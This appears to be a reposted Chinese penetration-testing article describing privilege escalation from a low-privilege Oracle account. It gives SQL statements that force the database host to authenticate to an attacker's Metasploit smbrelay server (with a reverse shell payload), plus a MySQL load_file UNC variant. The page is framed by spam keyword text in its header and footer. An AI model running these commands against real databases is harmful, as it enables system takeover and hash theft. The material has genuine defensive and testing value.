成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

使用低權限Oracle數據庫賬戶得到管理員權限

安全 數據安全
這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺挺有意思的,文檔的 大概意思就是說,如果 ORACLE 服務是用 administrator 賬戶啟動的,你只要有一個具有 resource 和connect 權限的數據庫賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個 SMB 欺 騙 服 務 器 , 來得到系統的訪問權限。我本地測試了下,還真的成功了。

這幾天看了篇叫"Penetration: from application down to OS (Oracle)"的文檔,感覺挺有意思的,文檔的 大概意思就是說,如果 ORACLE 服務是用 administrator 賬戶啟動的,你只要有一個具有 resource 和connect 權限的數據庫賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個 SMB 欺 騙 服 務 器 , 來得到系統的訪問權限。我本地測試了下,還真的成功了。:-)

具體的原理分析看原文吧,我這里把我的測試過程寫出來.

我的滲透環境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數據庫版本為 10.2.0.1.0,服務啟動權限為 administrator,數據庫賬戶用的是 dbsnmp 賬戶的默認權限.

 


1.先用 netstat 命令查看一下,本地的 139 端口有沒有占用,一般占用此端口的服務就是 Samba 了,要關掉。ubuntu 的關閉方法是 sudo /etc/init.d/samba stop




 

2.運行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應配置后,exploit.就能用 netstat 看到本地已經監聽了 139 和 8522 端口了.





3.我現在使用 dbsnmp 默認賬戶連接到 oracle 數據庫上,這個賬戶默認權限是比較低的,只有 connect和 resource 權限。

  

4.然后執行下面 3 條 SQL 語句

SQL> CREATE TABLE files(id NUMBER PRIMARY KEY,path VARCHAR(255)UNIQUE,ot_format VARCHAR(6));

SQL> INSERT INTO files VALUES(1,'\\192.168.1.52\mickey',NULL);

SQL> CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context2   PARAMETERS('datastore ctxsys.file_datastore format column ot_format');




當執行完 create index 這句的時候,在看咱們本地的 metasploit,就已經得到 ORACLE 數據庫主機的系統當前服務用戶的 half lm 哈希和 cmdshell 了。

  

 




 

后來經過 pt007 的提醒,我又測試了 mysql,如果服務也是 administrator 啟動的,用

select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系統權限的.MSSQL 應該用 xp_dirtree 存儲過程 也是可以的,不過我沒有配置出來用 administrator 賬戶啟動 MSSQL 服務,希望知道的朋友指點下我。 這個技術可以用到內網 WEB 評估的時候,如果有注入,服務又是 administrator 啟動的,可以提權了。

【編輯推薦】

  1. 詳解有關Windows系統下的權限設置
  2. SQL Server 2005和Oracle 10g安全性比較
責任編輯:Oo小孩兒 來源: CSDN
相關推薦

2009-11-06 17:39:41

2009-10-22 16:53:08

2009-10-26 17:29:21

Oracle管理員數據庫管理

2011-03-15 13:06:06

Oracle數據庫管理員

2011-03-15 13:25:41

Oracle數據庫管理員維護

2011-08-17 15:29:00

2014-04-24 09:51:47

Linux管理員ACL集體權限

2011-03-15 11:34:43

Oracle數據庫管理員任務

2009-10-27 13:20:19

Oracle默認管理員

2010-06-07 21:01:45

管理員權限GPO

2017-06-14 14:33:58

2009-02-20 20:02:16

2019-07-17 17:00:29

數據庫數據庫管理員DBA

2020-07-21 15:52:01

騰訊云數據庫SQL Server

2019-11-12 09:07:35

Linux命sudo

2019-11-13 17:15:21

Linux工具SUDO

2023-03-22 09:18:53

數據庫管理架構

2017-03-14 13:57:15

數據庫權限分配探討

2010-04-09 17:35:22

2011-04-13 09:53:20

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 久久天天躁狠狠躁夜夜躁2014 | 国产高清精品一区二区三区 | av一区二区三区在线观看 | 国产在线观看av | 国产精品美女www爽爽爽视频 | 91视频正在播放 | 久久精品天堂 | 神马九九 | 日日摸夜夜爽人人添av | 国精产品一品二品国精在线观看 | 免费黄视频网站 | 日韩中文字幕区 | 国产精品国产三级国产aⅴ原创 | 亚洲黄色一区二区三区 | 欧美视频区 | 亚洲国产一区二区三区在线观看 | 国产目拍亚洲精品99久久精品 | 一区二区高清 | 久久久男人的天堂 | 日日摸日日碰夜夜爽2015电影 | 亚洲精品国产成人 | 亚洲一级毛片 | 亚洲va中文字幕 | 中文字幕日韩欧美一区二区三区 | 久久久免费少妇高潮毛片 | 成人一区二区三区在线观看 | 亚洲一区二区三区视频在线 | 亚洲综合在线视频 | 国产成人一区 | 亚洲国产视频一区二区 | 天天拍夜夜爽 | 操操日| 国产精品久久久久久久久久妞妞 | 国产成人在线视频免费观看 | 色综合视频在线 | 99精品国产一区二区三区 | 一级做a| 理论片免费在线观看 | 911精品美国片911久久久 | 欧美视频一区二区三区 | 日本精品一区二区 |